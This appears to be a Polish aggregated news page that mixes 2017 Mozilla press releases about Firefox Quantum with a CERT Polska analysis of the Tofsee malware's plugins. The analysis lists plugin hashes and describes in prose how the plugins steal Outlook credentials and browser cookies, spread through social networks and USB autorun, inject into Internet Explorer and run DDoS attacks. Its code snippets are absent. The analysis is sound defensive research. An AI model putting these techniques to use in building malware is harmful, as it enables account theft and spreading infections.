W 2015 roku Firefox stał się jedyną przeglądarką, która domyślnie włączyła Ochronę przed śledzeniem w trybie prywatnego przeglądania. Ochrona przed śledzeniem, jak sama nazwa wskazuje, blokuje ładowanie zasobów, jeśli otwierany adres URL znajduje się na liście znanych modułów śledzących, zgodnie z listą Tracking Protection stworzoną przez Disconnect. Lista ta jest zrównoważonym podejściem do blokowania i nie obejmuje witryn przestrzegających polityki Do Not Track (zgodnie z wytycznymi EFF). Ta funkcja ma na celu zapobieganie śledzenia użytkowników, którzy wyraźnie zdecydowali się na korzystanie z prywatnego przeglądania. W efekcie jednak witryny, które próbują załadować zawartość z adresów URL na liście śledzenia, ładują się znacznie szybciej. Poprzednie badanie Firefoksa z 2015 roku wykazało, że średni czas wczytywania stron był skrócony na stronach z aktualnościami o 44%.

Ponieważ Firefox Quantum jest najszybszą wersją Firefoksa do tej pory, pomyśleliśmy, że porównamy czasy ładowania strony w trybie prywatnym w Firefox Quantum (które obejmuje funkcję Tracking Protection) z trybem Incognito przeglądarki Chrome, który nie obejmuje funkcji ochrony przed śledzeniem.

Metodologia Pomiary zostały wykonane przez Disconnect, organizację odpowiedzialną za listy domen używanych do zasilania funkcji Tracking Protection. Czas ładowania strony dla 200 najpopularniejszych witryn z wiadomościami według rankingu Alexa.com został zmierzony przy użyciu przeglądarki Firefox Quantum (wersja beta 57.0b10v57) w trybie domyślnym i trybie przeglądania prywatnego oraz w najnowszej wersji Chrome (v61.0.3163.100) dostępnej w czasie wykonywania testów – także w trybach domyślnych i incognito. Do testów zostały wybrane strony z wiadomościami, ponieważ mają najwięcej trackerów.

Każda z witryn z wiadomościami została załadowana 10 razy. Aby test mógł mierzyć porównywalne czasy i mógł być powtórzony przez innych, czasy ładowania zostały zmierzone za pomocą interfejsu API PerformanceTiming zarówno dla przeglądarki Firefox, jak i Chrome dla każdego ładowania strony. Całkowity czas ładowania jest uważany za różnicę między PerformanceTiming.loadEventEnd i PerformanceTiming.navigationStart. Testy były kontrolowane za pomocą automatycznego skryptu.

Wszystkie rundy testowe zostały przeprowadzone na nowym Macbook Pro (13” Macbook Pro 2017, 3.1GHz i5, 16 GB pamięci, OSX 10.13). Testy wykonane zostały na szybkim połączeniu sieciowym z Macbookiem Pro połączonym z łączem internetowym 100 Mb / s przez WiFi (802.11ac, 867Mbit / s). Aby zapoznać się z metodologią, przeczytaj posta z bloga Mozilla Hacks.

WynikiPo przebadaniu 200 witryn z wiadomościami średni czas wczytywania strony w przeglądarce Firefox Quantum to 3,2 s w porównaniu z trybem incognito w przeglądarce Chrome, który trwał średnio 7,7 sekundy, aby wczytać stronę szybkiego połączenia Gigabit. Oznacza to, że przeglądanie prywatne Firefox Quantum ładuje stronę 2.4x szybciej niż Chrome w trybie incognito.

Porównanie średnich czasów ładowania w Chrome pokazuje również, że sam tryb incognito nie przynosi żadnych ulepszeń szybkości. To właśnie ochrona przed śledzeniem robi różnicę jak pokazują wyniki dla przeglądarki Firefox Quantum.

Innym sposobem odczytywania tych danych jest określenie czasu, który użytkownicy mogą zaakceptować na załadowanie stron. Niedawno przeprowadzone przez SOASTA Inc. badania wykazały, że średni czas ładowania sesji wynoszący 6 sekund daje już 70-procentowy współczynnik odrzuceń. Dlatego warto umieścić nasze pomiary w kontekście oglądania stron w przeglądarce, które trwały dłużej niż 6 sekund.

95% ładowanych stron osiągnęło 6-sekundowy lub szybszy próg przy użyciu prywatnego przeglądania w Firefox Quantum z włączoną ochroną przed śledzeniem, podczas gdy tylko 70% stron ładowało się w Chrome, pozostawiając tym samym prawie jedną trzecią stron z wiadomościami, które się nie załadowały.

Co dalej?

O ile ulepszenia prędkości w Firefoksie Quantum będą się różnić w zależności od witryny, to użytkownicy mogą oczekiwać, że przeglądanie prywatne w przeglądarce Firefox będzie szybsze od trybu incognito w Chrome.

Dzięki tym badaniom, chcieliśmy, aby użytkownicy mogli czerpać korzyści ze zwiększonej prędkości i prywatności poza trybem przeglądania prywatnego. Dzięki przeglądarce Firefox Quantum użytkownicy mają teraz możliwość włączenia funkcji ochrony przed śledzeniem w Firefoksie w dowolnym momencie.

Zainteresowany? Wypróbuj prywatne przeglądanie!

Jeśli chciałbyś korzystać z fukncji Tracking Protection za każdym razem, kiedy korzystasz z Firefoksa, pobierz Firefox Quantum i otwórz „Preferencje”. Wybierz „Ochrona i Prywatność” i zjedź na dół, aż znajdziesz „Tracking Protection”. Wybierz opcję „Zawsze”, aby usprawnić szybkość i ochronę zawsze, kiedy będziesz korzystać z Firefox Quantum.

Pamiętaj, że uruchamiając Tracking Protection możesz zablokować narzędzia do lubienia i komentowania oraz niektóre treści wideo.

Jeśli Tracking Protection to funkcja, której wcześniej używałeś, lub którą chcesz używać regularnie, wypróbuj Firefox Quantum i sprawdź, jaka jest szybka!


Firma Disconnect Inc. i Mozilla nawiązały współpracę w 2015 r., aby opracować funkcję ochrony przed śledzeniem w Firefoksie, zapewniając kontrolę nad danymi, które są pozyskiwane przez niepowołane strony. Lista blokowanych witryn oparta jest na liście znanych modułów śledzących, zgodnie z definicją listy Disconnect’s Tracking Protection. Jako kolejny krok zadawaliśmy sobie pytanie, czy tryb przeglądania prywatnego Firefoksa z funkcją Tracking Protection może również zapewniać dodatkowe korzyści.

Contributors: Peter Dolanjski & Dominik Strohmeier – Mozilla, Casey Oppenheim & Eason Goodale – Disconnect Inc.

Centrum prasowe Mozilli, 20 listopada 2017, 14:47

14 listopada 2017

Centrum prasowe Mozilli

Google domyślną wyszukiwarką w Firefoksie w Stanach, Kanadzie, Hong Kongu i na Tajwanie

Dziś swoją premierę ma Firefox Quantum. Jest to najszybszy, jak do tej pory, Firefox z nowym interfejsem zbudowany na całkowicie zrestrukturyzowanym silniku. Ponieważ w Firefox Quantum skupiamy się na wrażeniach użytkowników i wydajności, Google będzie nową domyślną wyszukiwarką dla Stanów Zjednoczonych, Hong Kongu i na Tajwanie.

Inni dostawcy wyszukiwania to Yandex w Rosji, Turcji, na Białorusi i w Kazachstanie, Baidu w Chinach i Google w całej reszcie świata. Firefox daje więcej możliwości wyboru niż jakakolwiek inna przeglądarka, dzięki 60 wyszukiwarkom zainstalowanym w ponad 90 językach.

Jest to część naszej strategii wyszukiwania, ogłoszonej w 2014 roku, aby wybrać najlepszą wyszukiwarkę dla każdego regionu, w przeciwieństwie do jednej na całym świecie.

 

 

 

 

 

 

 

Przykładamy dużą wagę do tworzenia jak najlepszego doświadczenia dla użytkowników i kontynuujemy prace nad dostarczaniem użytkownikom lokalnych rozwiązań i promowaniem innowacji.

Jeśli nie wypróbowałeś jeszcze nowego Firefoksa, możesz to zrobić tutaj.

Centrum prasowe Mozilli, 14 listopada 2017, 14:56

Przedstawiamy nowego Firefoksa: Firefox Quantum

Szybki. Naprawdę szybki. Firefox Quantum jest ponad dwa razy szybszy od Firefoksa sprzed 6 miesięcy. Napędzany rdzeniowym silnikiem opartym na nowej technologii opracowanej przez naszą zaawansowaną grupę badawczą Firefox pozwoli Ci robić to, co umiesz najlepiej. Teraz możesz odwiedzać mnóstwo stron i bez obaw otwierać miliony kart, ponieważ Firefox Quantum zużywa mniej pamięci niż konkurencja. Twój komputer będzie Ci wdzięczny. 🙂

Jest to zdecydowanie największa aktualizacja, jaką mieliśmy od czasu uruchomienia Firefoksa 1.0 w 2004 roku – lepsza pod każdym względem. Instalując ją teraz, od razu zauważysz różnicę. Jeśli jesteś ciekawy, co zmieniliśmy, czytaj dalej.

Pierwszą rzeczą, którą zauważysz, jest szybkość. Otwórz kilka kart i baw się dobrze. Drugą rzeczą jest nowy interfejs użytkownika (UI). Tę inicjatywę nazwaliśmy Photon, a jej celem jest modernizacja i ujednolicenie wszystkiego, co jest związane z Firefoksem, przy użyciu nowego szybkiego silnika. Zgadłeś: interfejs użytkownika Photon jest niesamowicie szybki i płynny. Aby stworzyć projekt Photon nasz zespół zbadał, w jaki sposób użytkownicy korzystają z sieci. Przyjrzeliśmy się sprzętowi z całego świata, aby Firefox wyglądał świetnie na każdym ekranie i upewniliśmy się, że Firefox działa jak Firefox, niezależnie od używanego urządzenia. Nasi projektanci stworzyli system, który jest dopasowany nie tylko do obecnego sprzętu, ale pozwoli nam rozwijać się w przyszłości.

Wprowadziliśmy wiele usprawnień w zakresie wydajności w rdzeniu przeglądarki i dodaliśmy nowy silnik CSS, Stylo, który lepiej wykorzystuje dzisiejszy sprzęt z wieloma rdzeniami, zoptymalizowanymi pod kątem niskiego zużycia energii. Firefox został ulepszony tak, aby karta, na której jesteś była traktowana priorytetowo, lepiej wykorzystując cenne zasoby systemowe. Bazowaliśmy na zmianach, które zostały wprowadzone w czerwcu. Ale to jeszcze nie koniec. David Bryant, który pierwszy wspomniał o Projekcie Quantum, wyjaśnia, jakie mamy plany i co robimy, aby nadal poprawiać wydajność przeglądarki.

W ramach koncentrowania się na doświadczeniach użytkowników i wydajności w Firefoksie Quantum, Google stanie się naszą nową domyślną wyszukiwarką w Stanach Zjednoczonych i Kanadzie. Dzięki 60 wyszukiwarkom zainstalowanym w ponad 90 językach, Firefox oferuje większy wybór dostawców wyszukiwania niż jakakolwiek inna przeglądarka.

Wprowadzenie wszystkich tych zmian w Firefoksie to nie lada wyczyn. Pracownicy i wolontariusze z całego świata pracowali w rekordowym czasie, aby stworzyć najlepszego Firefoksa. Zobaczmy, co udało nam się osiągnąć w ubiegłym roku.

Nowy Firefox Quantum w liczbach:

(więcej ciekawostek na blogu Firefox Frontier)

Ilu autorów dodało kod?

Ilu wolontariuszy przyczyniło się do rozwoju kodu?

Na ile sposobów można dostosować pasek narzędzi w nowej przeglądarce Firefox?

Słyszeliśmy już kilka opinii o Firefox Quantum, kiedy był jeszcze w fazie beta, oto kilka z nich:

“[Firefox] flies.” — @DaveVoyles

“This is called mind blowing stuff.” — @sndp_007

“Flipping fast” — @cubicgarden

“It’s quite a leap” or “IT’S SO FAST” — @felixreiseberg

“Its speed is 😍😍” — @sayo_paul

Przetestuj nowego Firefoksa dla systemów Windows, Mac lub Linux. Nowy wygląd będzie też dostępny na iOS i Androidzie.

O pracy, jaką włożyliśmy w stworzenie Firefox Quantum oraz kolejnych zmianach, które będą wprowadzane, moglibyśmy jeszcze długo opowiadać. Ale teraz powinieneś przestać czytać i pobrać nowego Firefoksa. To z pewnością poprawi Ci humor!

Pobierz tu:  iOS  Android Desktop

Centrum prasowe Mozilli, 14 listopada 2017, 14:07

19 października 2017

CERT Polska

Głębsze spojrzenie na moduły Tofsee

logo

Tofsee jest złośliwym oprogramowaniem z wieloma funkcjami – może kopać bitcoiny, wysyłać emaile, kraść dane dostępowe, wykonywać ataki DDoS i wiele więcej.

Pisaliśmy już o Tofsee/Ghegu kilka miesięcy temu – nasza analiza znajduje się pod adresem https://www.cert.pl/news/single/tofsee. Znajomość tamtego posta jest potrzebna żeby w pełni zrozumieć obecnie omawiany temat. Ten post ma za zadanie tylko rozszerzyć tamte badania, koncentrując się na funkcjach wtyczek, których wcześniej nie opisaliśmy.

Podsumujemy pokrótce każdy moduł i podkreślimy jego najważniejsze możliwości.

Ten post jest raczej długi – dla niecierpliwych, lista hashy i spis treści w jednym:

ID Zasobu Nazwa DLL Hash pluginu
1 ddosR.dll fbc7eebe4a56114e55989e50d8d19b5b
2 antibot.dll a3ba755086b75e1b654532d1d097c549
3 snrpR.dll 385b09563350897f8c941b47fb199dcb
4 proxyR.dll 4a174e770958be3eb5cc2c4a164038af
5 webmR.dll 78ee41b097d402849474291214391d34
6 protect.dll 624c5469ba44c7eda33a293638260544
7 locsR.dll 2d28c116ca0783046732edf4d4079c77
10 hostR.dll c90224a3f8b0ab83fafbac6708b9f834
11 text.dll 48ace17c96ae8b30509efcb83a1218b4
12 smtp.dll 761e654fb2f47a39b69340c1de181ce0
13 blist.dll e77c0f921ef3ff1c4ef83ea6383b51b9
14 miner.dll 47405b40ef8603f24b0e4e2b59b74a8c
15 img.dll e0b0448dc095738ab8eaa89539b66e47
16 spread.dll 227ec327fe7544f04ce07023ebe816d5
17 spread2.dll 90a7f97c02d5f15801f7449cdf35cd2d
18 sys.dll 70dbbaba56a58775658d74cdddc56d05
19 webb.dll 8a3d2ae32b894624b090ff7a36da2db4
20 p2p.dll e0061dce024cca457457d217c9905358

1. ddosR.dll

Oryginalna nazwa pliku: p:\cmf5\small2\plugins\plg_ddos\ddos.cpp

Zadaniem tego pluginu jest wykonywanie ataków DDoS na wskazane cele. Zaimplementowane metody nie są zbyt skomplikowane, np. wykonywanie wielu zapytań (tzw. HTTP Flood):

Albo stary dobry SYN flood (używając sterownika PassThru, czyli modułu grabb).

Nie zaobserwowaliśmy jeszcze żadnej aktywności DDoS od Tofsee – prawdopodobnie ten plugin obecnie nie jest wykorzystywany przez botmastera.

Konfiguracja otrzymywana z C&C dla tego pluginu jest bardzo prosta:

Moduły zawierają wiele napisów, które znacznie upraszczają analizę:

2. antibot.dll

Oryginalna nazwa pliku: z:\cmf5\small2\plugins\plg_antibot\plugin.cpp

To bardzo interesujący plugin – jego celem jest usunięcie innych rodzajów złośliwego oprogramowania z komputera ofiary.

Jest w stanie:

Lista dodatków usuwanych aktualnie przez moduł (pobranych z C&C):

3. snrpR.dll

Oryginalna nazwa pliku: p:\\cmf5\\small2\\plugins\\plg_sniff\\sniff.cpp

Powiązana sekcja w konfiguracji:

Ruch jest podsłuchiwany i przechwytywany przez sterownik PassThru (dostępny przez named pipe „\\\\.\\PassThru”).

Przykładowy szablon który otrzymaliśmy (mimo że ta funkcja jest obecnie wyłączona):

Jak widać, szablon zostawia oryginalne nagłówki From, To (%FROM_LINE, %TO_LINE), dodatkowo ma opcję zostawienia oryginalnego tematu (%SUBJ, %_SUBJ) i oryginalnego czasu (%DATE, %P5DATE, %M5DATE)

4. proxyR.dll

Oryginalna nazwa pliku: p:\\cmf5\\small2\\plugins\\plg_proxy\\plugin.cpp

Ten moduł nasłuchuje na połączenia TCP na adresie 0.0.0.0:1080 i dostarcza wielowątkowy serwer SOCKS proxy. Wersja, którą analizowaliśmy, identyfikuje się w nagłówku Proxy-agent jako WinRoute Pro/4.1.

Ruch jest przekierowywany do adresów wpisanych w sekcji proxy_cfg, osobno dla każdego regionu:

Adresy są albo wpisane jako referencje do listy work_srv, albo bezpośrednio:

W proxy_cfg mamy też listę skonfigurowanych dla socketów timeoutów:

Kiedy brakuje jakiejś wartości w konfiguracji, program ma kilka domyślnych wartości zapewniających działanie.

Moduł dodatkowo dodaje mapowanie portu używając UPnP, przedstawiając się jako Skype:

Napisy z programu dają trochę wglądu w cel i wewnętrzne działanie tego pluginu:

6. protect.dll

Oryginalna nazwa pliku: z:\cmf5\small2\plugins\plg_protect\plugin.cpp

Ten moduł pobiera i instaluje złośliwą usługę w systemie:

Złośliwa usługa jest obfuskowana „nowoczesnym algorytmem szyfrowania” – czyli każdy bajt jest negowany:

Md5 zdeszyfrowanego backdoora = 49642f1d1b1673a40f5fa6263a66d056. Ten backdoor jest chroniony przez packer i to jedyne zaobserwowane przez nas jego użycie podczas całego procesu analizy Tofsee – może to sugerować, że był stworzony przez innego aktora i później wykorzystany przez twórców Tofsee.

7. locsR.dll

Oryginalna nazwa pliku: z:\cmf5\cmf5\small2\plugins\plg_locs\plg.cpp

Ten plugin kradnie dane dostępowe do programu Microsoft Outlook:

Po wyciągnięciu ich z rejestru, są odszyfrowywane i wykorzystywane do wysłania większej liczby emaili. Dodatkowo, generuje adres email w postaci [nazwa komputera]@mail.run i próbuje wysłać emaile korzystając z niej (czystym protokołem SMTP).

Ciekawsze napisy z pliku:

10. hostR.dll

Plugin, który potrafi działać jako serwer HTTP. Przedstawia się Apache/2.2.15 (Win32). Może serwować pliki, prawdopodobnie dla innych botów (w połączeniu z pluginem p2p.dll).

Jest w stanie wykluczać niektóre IP – prawdopodobnie analityków bezpieczeństwa (np. całe zakresy adresowe Forcepoint i Google są zbanowane).

Pobrana z C&C konfiguracja dla tego modułu:

11. text.dll

Oryginalna nazwa pliku: p:\cmf5\small2\plugins\plg_text\plg_text.cpp.

Bardzo prosty plugin, jest w stanie tylko przetwarzać szablony emaili pobranych z serwera C&C.

12. smtp.dll

Bardzo ważny moduł – generuje i wysyła emaile. Jest prawdopodobnie największym pluginem, a jego kod jest często skomplikowany.

Najciekawszą rzeczą w nim jest fakt, że do generowania wiadomości używa własnego dedykowanego języka skryptowego. Przykładowy skrypt otrzymany od C&C:

Jeśli ktoś jest w stanie rozpoznać ten język skryptowy, bardzo chętnie dowiedzielibyśmy się co jeszcze z niego korzysta. Jako że nie widzieliśmy wcześniej czegoś takiego, spróbowaliśmy przeanalizować interpreter tego języka.

Składnia jest raczej prosta, ale bardzo podobna do asemblera i prymitywna. Mamy nadzieję że autorzy malware generują ten skrypt z jakiegoś bardziej wysokopoziomowego języka, bo pisanie w takim czymś musi bardzo ranić zdrowie psychiczne programisty ;].

Wspieranych jest bardzo wiele opcodów – polecamy spojrzeć na tę uproszczoną funkcję parsującą jako przykład:

Nie przeanalizowaliśmy ich wszystkich, ale kilka najważniejszych to:

Dodatkowo, otoczenie tekstu w „”” pozwala na znaki nowej linii i escape sequences, a __v(XX)__ to interpolacja zmiennych.

Ponownie, kilka ciekawszych napisów, które można znaleźć w tym pliku:

Przez chwilę myśleliśmy, że IfYouAreReadingThisYouHaveTooMuchFreeTime to easter-egg dla nas, analityków malware – ale okazuje się że to tylko dziwny specjalny przypadek związany z logowaniem do hotmaila.

Konfiguracja, którą pobraliśmy dla tego modułu z C&C:

13. blist.dll

Ten plugin sprawdza czy bot znajduje się na listach spambotów. W konfiguracji, którą zaobserwowaliśmy, następujące DNSBL (DNS-based Blackhole List) były używane:

DNSBL to usługa bazująca na DNS, używana do publikowania adresów IP nadających spam. Jeśli serwer mailowy używa DNSBL, wykona żądanie DNS do domeny DNSBL z każdym nadchodzącym połączeniem SMTP. Techniczne detale tego rozwiązania są poza zakresem naszego posta, ale jeśli ktoś jest ciekawy może spojrzeć na http://www.us.sorbs.net/using.shtml albo https://en.wikipedia.org/wiki/DNSBL.

Sprawdzenie DNSBL w malware jest wykonywana za pomocą gethostbyname.

Konfiguracja modułu pobrana z C&C:

14. miner.dll

Jak sama nazwa wskazuje, jest to koparka kryptowalut. Ten plugin służy tylko do koordynacji pracy, ale ma kilka powiązanych programów, które wykonują całą „ciężką pracę”.

Jeden z programów, nazywany grabb, jest dystrybuowany prosto z C&C. Inne są pobierane z URLi zapisanych w konfiguracji – w teorii. W praktyce serwery dystrybuujące programy kopiące wyglądają na martwe, więc nie byliśmy w stanie ich pobrać.

Miner.dll weryfikuje że na pewno pobrał poprawny program, ale być może hashowanie było za trudne do zaimplementowania dla twórców, więc użyli prostszej metody – porównanie długości – na przykład, upewniają się że pobrany program cores_gt_1 ma dokładnie 223744 bajtów.

Nie analizowaliśmy tego pluginu bardzo dokładnie, bo koparki bitcoinów nie leżą w naszym obszarze zainteresowań, a napisy dały wystarczająco wiele informacji o tym co dzieje się w środku i tak:

A resztę można znaleźc w konfiguracji pobranej z C&C:

15. img.dll

Ten krótki plugin służy do przetwarzania złośliwych załączników – koduje je za pomocą algorytmu base64 i załącza do emaili.

Nie ma tu nic interesującego, jak widać w napisach zapisanych w kodzie:

Konfiguracja dla tego modułu pobrana z C&C.

16. spread.dll

Ten plugin jest wykorzystywany żeby rozprzestrzeniać Tofsee przez media społecznościowe: Facebooka, Twittera oraz komunikator Skype.

Najpierw wyciąga ciastka xs, datr, c_user (i więcej).

Dokładna metoda zależy od przeglądarki, ale generalnie wtyczka czyta ciastka zapisane na dysku przez przeglądarkę. Na przykład cookies.sqlite z \Mozilla\Firefox\Profiles dla Firefoxa. Wspierane przeglądarki to Chrome, IE, Firefox, Safari i Opera.

Następnie plugin używa tych ciastek np. żeby podszyć się pod użytkownika przed API Facebooka:

Lista przyjaciół jest pobierana przez API i wiadomość jest wysyłana do każdego z nich. Format wiadomości jest przechowywany w konfiguracji, na przykład:

‚fb.message1’: ‚%SPRD_TEXT1|%LANG_ID| %SPRD_URL1’

Twitter jest obsługiwany bardzo podobnie – ciastka są kradzione, followersi są pobierani przez API pod adresem https://twitter.com/followers, a następnie wysyłane są wiadomości.

Dodatkowo wspierane jest rosyjskie VKontakte, ale ta funkcja jest opcjonalna i trzymana w osobnym pluginie. Opisywany tu moduł sprawdza tylko czy VK jest włączony w konfiguracji i wywołuje odpowiedni handler (który musi być inicjalizowany z innego pluginu), jeśli jest zdefiniowany. Twórcy złośliwego oprogramowania zazwyczaj nie obierają na cel Rosji, więc ta funkcja jest wyłączona i moduł do Vkontakte nie jest rozpowszechniany.

Moduł może również rozprzestrzeniać się za pomocą Skype, ale analiza wsteczna protokołu Skype była widocznie za trudna, więc twórcy poszli na łatwiznę i wtyczka czeka, aż Skype zostanie uruchomiony, po czym wysyła wiadomości windowsowe do okna Skype:

Ten plugin ma dziesiątki zapisanych napisów, więc analiza w deasemblerze jest bardzo prosta. Kilka ciekawszych grup:

Referencje do pluginu OCR – żeby rozwiązywać Captchę:

Ciastka Facebooka:

Napisy związane z rozpowszechnianiem się przez Facebooka:

Napisy związane z kradzieżą ciasteczek:

Napisy związane z przechwytywaniem Skype:

Ciastka Twittera:

I rozpowszechnianie się przez Twittera:

Na koniec napisy związane z wysyłaniem ciasteczek:

Dużo funkcji oznacza dużo konfiguracji od C&C:

17. spread2.dll

Plugin stosujący metody sprzed ponad 15 lat – przenosić Tofsee przez… zainfekowane nośniki USB! Nie brzmi to jak dobra strategia w roku 2017, ale mimo to, jest on ciągle aktywny.

Najpierw złośliwy program jest kopiowany jako RECYCLER\<random_gibberish>.exe na nośnik USB, następnie są na nim ustawiane atrybuty READONLY i SYSTEM, a finalnie zapisywany jest złośliwy autorun.inf:

Złośliwy program, który będzie dystrybuowany, jest pobierany z Internetu (patrz również sys.dll i zmienna %FIREURL).

W napisach nie ma wiele ciekawego, poza logami:

A konfiguracja dla modułu jest dość uboga:

18. sys.dll

Ten plugin wygląda na downloader, albo raczej program aktualizujący. Wysyła on żądanie zależne od zawartości zmiennej %FIREURL w konfiguracji:

Przykładowe wartości %FIREURL (jeden na linię):

Zmienne są podmieniane rekursywnie, a %SYS_RN oznacza \r\n, więc pierwsza możliwa wartość powinna być traktowana jako:

Jeśli wyślemy to żądanie do odpowiedniego IP na porcie 80, otrzymamy kolejny złośliwy program. Różne żądania zwracają inne programy.

Jeśli żądanie jest niepoprawne, albo nie wspierane, zwracany jest następujący obraz:

Doceniamy poczucie humoru.

Nic zaskakującego w napisach:

Konfiguracja od C&C:

Dodatkowo używana jest zmienna %FIREURL z głównego modułu.

19. webb.dll

Ta wtyczka szuka procesu iexplore.exe. Jeśli znajdzie go, wstrzykuje do niego DLL IEStub.dll.

IEStub.dll przechwytuje bardzo dużo funkcji – lista:

Hooki przechwytują wołane funkcje i mogą nawet zmienić im parametry. Nie analizowaliśmy ich dokładnie, ale większość z nich to bardziej loggery, które tylko przechwytują interesujące dane z parametrów. Nie zaobserwowaliśmy żeby Tofsee serwowało jakiekolwiek web injecty.

Dla kompletności, interesujące napisy:

Konfiguracja dla tego modułu pobrana z C&C:

20. P2P.dll

Oryginalna nazwa pliku: p:\cmf5\small2\plugins\plg_p2p\plg_p2p.cpp

Ten plugin jest raczej krótki. Mimo że ma obiecującą nazwę, nie ma w nim wiele ciekawego – otwiera port na routerze i nasłuchuje połączeń. Nie implementuje żadnych poleceń, wszystko jest zostawione dla głównego modułu (albo pluginów, jak np. serwer HTTP).

Jak prawie każdy moduł, zapisuje logi do pliku %TMP%\log_%s.txt, a jeśli to się nie uda, to do C:\log.txt.

Dodaje również mapowanie portu używając UPnP, w taki sam sposób jak plugin 4 (proxyR.dll).

Konfiguracja otrzymana z C&C:

Interesujące napisy:

Artykuł Głębsze spojrzenie na moduły Tofsee pochodzi z serwisu CERT Polska.

Jarosław Jedynak, 19 października 2017, 11:36

17 października 2017

Centrum prasowe Mozilli

Tygodniowy festiwal dla lepszego internetu

Już za tydzień Mozilla organizuje spotkanie technologów, aktywistów i artystów, aby rozmawiać o największych problemach dotyczących internetu

Stan internetu zaczyna się pogarszać. Ataki ransomware, trollowanie i inwigilacja na szeroką skalę są zagrożeniem dla zdrowia internetu.

„Internet zagościł w naszym życiu w sposób, którego sobie wcześniej nie wyobrażaliśmy. Dostęp do sieci nie jest już dobrem luksusowym, a podstawą życia w XXI wieku. Wirusy to nie są już pojedyncze ostrzeżenia dotyczące jednego urządzenia. To realne zagrożenia, które mogą zakłócać pracę szpitali, rządów, jak i całych miast” – mówi Mark Surman, Executive Director w Mozilli.

Jest również wiele pozytywnych aspektów internetu. Każdego dnia tworzą się nowe społeczności niezależnie od odległości dzielących jej członków. Start-upy i artyści mają dostęp do globalnych zasobów, a projekty open-source stawiają innowację i integrację przed zyskami.

Chcąc naprawić to, co złe i uwidocznić to, co dobre, Mozilla ponownie organizuje MozFest, coroczny festiwal w Londynie i postanawia się zająć tymi kwestiami.

W październiku odbędzie się już 8. edycja wydarzenia, na które przybędzie prawie dwa tysiące technologów, hakerów i aktywistów z całego świata.

Podczas tegorocznego festiwalu odbędą się m.in.:

 

Więcej informacji o MozFest znajduje się na stronie: https://mozillafestival.org/.

 

 

Centrum prasowe Mozilli, 17 października 2017, 09:19

28 września 2017

Centrum prasowe Mozilli

Screenshots, Send Tabs i więcej! Dzisiejsze wydanie Firefoksa to nowe funkcje i dodatki dla wszystkich użytkowników

Nasz zespół badaczy pracujący z użytkownikami Firefoksa zauważył, że mają oni spore zasoby kreatywnych rozwiązań i pomysły na to, co przeglądarka mogłaby robić – jak np. sama do siebie wysyłać zrzuty ekranu i linki.

Naszym celem jest usprawnienie przeglądarki, tak aby codzienne zadania były jeszcze prostsze, więc uzbroiliśmy Firefoksa w nowe funkcje.

Zapisuj i dziel się ulubionymi stronami ze Screenshots

Sieć jest osobista – często strony, które odwiedzacie – od mediów społecznościowych, przez strony podróżnicze ze śmiesznymi reklamami, nie są łatwe do zapisania. Dzięki narzędziu Screenshots, zapisywanie i dzielenie się tym, co widzicie online to tylko jedno kliknięcie.

Narzędzie Screenshots było dostępne w naszym programie Test Pilot pod nazwą Page Shot i okazało się najczęściej pobieranym eksperymentalnym narzędziem w historii Test Pilot. Nasz zespół poświęcił dużo czasu pracując nad zrozumieniem tego, jak użytkownicy korzystają z tego narzędzia i jak usprawnić jego działanie. Dlatego Firefox Screenshots umożliwia zapisywanie i dzielenie się zrzutami ekranu bezpośrednio z przeglądarki.

Jak to działa?

Po pierwsze Screenshots umożliwia Ci zapisywanie zrzutów ekranu bez pobierania dodatkowego oprogramowania. Możesz zaznaczyć obszar, który chcesz zapisać lub pozwolić, aby Screenshots zrobił to za Ciebie. Najedź na obszar, który Cię interesuje i kliknij.

Możesz wybrać, które zrzuty ekranu chcesz zapisać i łatwo się do nich dostać z paska narzędzi. Firefox automatycznie zapisuje je w chmurze na okres dwóch tygodni, ale możesz zmienić ten przedział czasu lub usunąć je z biblioteki w każdej chwili. Możesz też podzielić się zrzutami ekranu z innymi – bez względu na to jakiego urządzenia lub przeglądarki używają. Spróbuj sam i przekonaj się, za co nasi testerzy tak bardzo polubili to narzędzie.

Koniec z wysyłaniem sobie linków! Send Tabs przychodzi na ratunek

Firefox daje użytkownikom sposób na szybsze dzielenie się treściami pomiędzy urządzeniami mobilnymi i stacjonarnymi. Nazywa się Send Tabs.

Send Tabs to najszybszy sposób na przesłanie każdej strony z oraz na przeglądarkę na komputerze czy urządzeniu mobilnym lub aplikacji. Oznacza to, że nie musisz już wysyłać sobie linków mailem! A Twoje dane są zaszyfrowane tak, że nawet Mozilla ich nie zobaczy.

Sprawdź sam:

Oszczędzaj czas z automatycznie uzupełniającym się formularzem

Uzupełnianie formularzy, bez względu na to czy kupujemy książkę czy przekazujemy środki finansowe, jest uciążliwe. Zaczynając od Stanów Zjednoczonych, stopniowo będziemy udostępniać funkcję automatycznego uzupełniania formularzy do wszystkich użytkowników naszej przeglądarki w wersji desktopowej.

Firefox pozwala użytkownikom na uzupełnienie formularzy z wieloma okienkami, dzięki szybkiemu wybieraniu z rozwijanego menu. Firefox automatycznie zapisze dane z pierwszego wypełnionego formularza, tak aby użytkownicy mogli użyć tych danych ponownie na innych stronach.

Użytkownicy mogą zachować wiele adresów: do pracy, domu, znajomych i rodziny. Zapisane adresy zsynchronizują się na wszystkich urządzeniach.

Pobierz najnowszą wersję Firefoksa lub wypróbuj Firefox Quantum w wersji Beta i sprawdź nowe funkcje. Aktualne wydanie przeglądarki przybliża nas do najszybszej wersji Firefoksa jak do tej pory – Firefox Quantum, która będzie dostępna od 14 listopada. Jeśli nie chcecie tyle czekać, możecie wypróbować wersję Beta. Nie zapomnijcie też o wypróbowaniu Screenshots – ikonka znajduje się w pasku narzędzi.

kornelia.gruszka, 28 września 2017, 17:09

26 września 2017

Centrum prasowe Mozilli

Włączcie silniki – Firefox Quantum w wersji Beta, edycja deweloperska

Silniki – zarówno te w samochodach, jak i w przeglądarkach – są bardzo ważne. Dlatego cieszymy się, że najnowszy Firefox w wersji beta jest wspomagany przez całkowicie unowocześniony silnik. A ponieważ sam numer najnowszego wydania – 57 – niewiele mówi o wielkości zmian, jakich dokonaliśmy, nową wersję nazywamy Firefox Quantum.

Droga do Firefox Quantum

W październiku zeszłego roku ogłosiliśmy Projekt Quantum, który miał na celu stworzenie silnika nowej generacji dla współczesnych komputerów, korzystając z technologii wypracowanych w ramach projektu Servo. Od tamtej pory nasz zespół inżynierów nieustannie skupiał się nad tym, żeby Firefox stał się nieporównywalnie szybki w działaniu.

